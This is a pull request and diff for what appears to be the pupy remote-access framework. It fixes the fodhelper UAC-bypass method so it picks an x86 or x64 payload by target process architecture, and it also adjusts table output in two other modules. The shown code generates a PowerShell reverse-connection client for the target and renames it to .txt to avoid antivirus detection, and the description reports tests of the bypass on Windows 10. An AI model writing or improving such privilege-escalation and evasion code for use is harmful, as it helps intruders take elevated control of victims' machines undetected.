### PR TITLE
Bug fix: fodhelper method (bypassuac) when x86 process

### DIFF
--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -117,17 +117,21 @@ class BypassUAC(PupyModule):
             else:
                 self.info("Reverse connection mode: Configuring ps1 client with the same configuration as the (parent) launcher on the target")
                 clientConfToUse = self.client.get_conf()
-            if method == "eventvwr":
-                #Specific case for eventvwr method
+            if method == "eventvwr" or method == "fodhelper":
+                #Specific case for eventvwr method and fodhelper
                 if '64' in  self.client.desc['proc_arch']:
                     local_file = pupygen.generate_ps1(self.log, clientConfToUse, x64=True)
+                    self.info("The process architecture on the target is x64: A x64 dll will be used...")
                 else:
                     local_file = pupygen.generate_ps1(self.log, clientConfToUse, x86=True)
+                    self.info("The process architecture on the target is x86: A x86 dll will be used...")
             else:
                 if '64' in  self.client.desc['os_arch']:
                     local_file = pupygen.generate_ps1(self.log, clientConfToUse, x64=True)
+                    self.info("The architecture of the target (OS) is x64: A x64 dll will be used...")
                 else:
                     local_file = pupygen.generate_ps1(self.log, clientConfToUse, x86=True)
+                    self.info("The architecture of the target (OS) is x86: A x86 dll will be used...")
 
             # change the ps1 to txt file to avoid AV detection
             random_name += '.txt'

--- a/pupy/modules/impersonate.py
+++ b/pupy/modules/impersonate.py
@@ -30,7 +30,7 @@ class ImpersonateModule(PupyModule):
                 'process': x[1],
                 'sid': x[2],
                 'username':x[3]
-            } for x in sids], wl=[
+            } for x in sids], [
                 'pid', 'process', 'username', 'sid'
             ])
 

--- a/pupy/modules/shares.py
+++ b/pupy/modules/shares.py
@@ -87,4 +87,4 @@ class Shares(PupyModule):
                     'ACCESS': x[1]
                 } for x in result['shares']]
 
-                self.table(shares, wl=['SHARE', 'ACCESS'])
+                self.table(shares, ['SHARE', 'ACCESS'])


### PR DESCRIPTION
I have detected a bug when you are on x64 OS and you are on a x86 process on the target (e.g. wind10): The x64 dll is used for bypassing UAC when _fodhelper_ method is used with powershell. The x86 dll should be used instead.

Tests done on wind10 (x64 arch, last release):
- x64 OS + x86 process: Good with this fix
- x64 OS + x64 process: OK

